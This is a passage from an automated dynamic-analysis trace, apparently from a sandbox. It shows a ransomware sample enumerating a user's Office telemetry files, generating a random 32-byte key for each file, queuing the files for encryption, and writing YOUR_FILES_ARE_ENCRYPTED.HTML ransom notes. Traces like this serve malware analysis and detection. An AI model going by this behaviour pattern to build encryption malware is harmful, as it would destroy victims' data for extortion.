returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (0) - 2104 - excel.exe - OTeleMediumCost.dat" [0159.665] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.665] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, 
dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.682] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf8c0c00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xdf8c0c00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xdf8c0c00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12c, dwReserved0=0x0, dwReserved1=0x60, cFileName="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat", cAlternateFileName="{DF01D~4.DAT")) returned 1 [0159.682] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat") returned 134 [0159.682] lstrcmpW (lpString1="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.682] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat") returned=".dat" [0159.682] lstrlenW (lpString=".dat") returned 4 [0159.682] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat") returned=".dat" [0159.682] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{df01d142-853f-4ec3-8f09-c2194cb1a39c} (1) - 2104 - excel.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, 
hTemplateFile=0x0) returned 0x58c [0159.683] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=300) returned 1 [0159.683] CloseHandle (hObject=0x58c) returned 1 [0159.683] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf8c0c00, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xdf8c0c00, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xdf8c0c00, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1e1, dwReserved0=0x0, dwReserved1=0x60, cFileName="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat", cAlternateFileName="{DF01D~3.DAT")) returned 1 [0159.683] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat") returned 144 [0159.683] lstrcmpW (lpString1="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.683] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0159.683] lstrlenW (lpString=".dat") returned 4 [0159.683] PathFindExtensionW (pszPath="{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat") returned=".dat" [0159.683] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{DF01D142-853F-4EC3-8F09-C2194CB1A39C} (1) - 2104 - excel.exe - OTeleMediumCost.dat" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{df01d142-853f-4ec3-8f09-c2194cb1a39c} (1) - 2104 - excel.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.684] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=481) returned 1 [0159.684] CloseHandle (hObject=0x58c) returned 1 [0159.684] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x11b, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat", cAlternateFileName="{FBC13~2.DAT")) returned 1 [0159.684] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat") returned 136 [0159.684] lstrcmpW (lpString1="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.684] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat") returned=".dat" [0159.684] lstrlenW (lpString=".dat") returned 4 [0159.684] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat") returned=".dat" [0159.684] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.684] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{fbc1308d-923e-401e-bdf2-42b4c79814cf} (0) - 1504 - outlook.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.685] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=283) returned 1 [0159.685] CloseHandle (hObject=0x58c) returned 1 [0159.685] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x34d, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat", cAlternateFileName="{FBC13~1.DAT")) returned 1 [0159.685] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat") returned 146 [0159.685] lstrcmpW (lpString1="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.685] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat") returned=".dat" [0159.685] lstrlenW (lpString=".dat") returned 4 [0159.685] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - 
OTeleMediumCost.dat") returned=".dat" [0159.685] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{fbc1308d-923e-401e-bdf2-42b4c79814cf} (0) - 1504 - outlook.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.686] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=845) returned 1 [0159.686] GetProcessHeap () returned 0x270000 [0159.686] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.689] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A3") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="7F") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="61") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="B4") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="DD") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="4A") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="14") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="D7") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="13") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="88") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="1A") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd13e, 
param_2="%02X" | out: param_1="46") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="4E") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="F5") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="A8") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="41") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="10") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="1E") returned 2 [0159.689] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="B4") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="F9") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="04") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="28") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="28") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="D2") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="0C") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="6C") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="77") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="35") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="80") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="AE") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="7A") returned 2 [0159.690] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="5E") returned 2 [0159.690] lstrcpyW (in: lpString1=0x74d20bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (0) - 1504 - outlook.exe - OTeleMediumCost.dat" [0159.690] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.690] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.762] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0xb8, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat", cAlternateFileName="{FBC13~4.DAT")) returned 1 [0159.762] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat") returned 136 [0159.762] lstrcmpW (lpString1="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.762] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat") returned=".dat" [0159.762] lstrlenW 
(lpString=".dat") returned 4 [0159.762] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat") returned=".dat" [0159.762] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTele.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{fbc1308d-923e-401e-bdf2-42b4c79814cf} (1) - 1504 - outlook.exe - otele.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.763] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=184) returned 1 [0159.763] CloseHandle (hObject=0x58c) returned 1 [0159.763] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat", cAlternateFileName="{FBC13~3.DAT")) returned 1 [0159.763] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat") returned 146 [0159.764] lstrcmpW (lpString1="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 
-1 [0159.764] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat") returned=".dat" [0159.764] lstrlenW (lpString=".dat") returned 4 [0159.764] PathFindExtensionW (pszPath="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat") returned=".dat" [0159.764] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\{fbc1308d-923e-401e-bdf2-42b4c79814cf} (1) - 1504 - outlook.exe - otelemediumcost.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0159.764] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=521) returned 1 [0159.764] GetProcessHeap () returned 0x270000 [0159.764] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.765] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="7D") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="92") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="0B") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="21") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="38") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="90") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="21") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="95") returned 2 [0159.766] wsprintfW 
(in: param_1=0x4ebd132, param_2="%02X" | out: param_1="3A") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="16") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="19") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A1") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="28") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="B9") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="7E") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="83") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="5E") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="CA") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="95") returned 2 [0159.766] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="CC") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="C2") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="6D") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="92") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="0C") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="68") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="6D") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="AA") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="C0") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="30") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="3F") 
returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="62") returned 2 [0159.767] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="6C") returned 2 [0159.768] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat" [0159.768] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.768] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.771] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82a878d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0x0, dwReserved1=0x60, cFileName="{FBC1308D-923E-401E-BDF2-42B4C79814CF} (1) - 1504 - outlook.exe - OTeleMediumCost.dat", cAlternateFileName="{FBC13~3.DAT")) returned 0 [0159.771] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.771] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0159.771] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\OTele\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\otele\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.772] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.774] CloseHandle (hObject=0x5a8) returned 1 [0159.775] GetProcessHeap () returned 0x270000 [0159.776] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.779] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ad2f470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x82a878d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x82a878d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="OTele", cAlternateFileName="")) returned 0 [0159.779] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.779] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0159.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
hTemplateFile=0x0) returned 0x4a8 [0159.780] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.790] CloseHandle (hObject=0x4a8) returned 1 [0159.791] GetProcessHeap () returned 0x270000 [0159.792] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.797] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad4ad7d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, 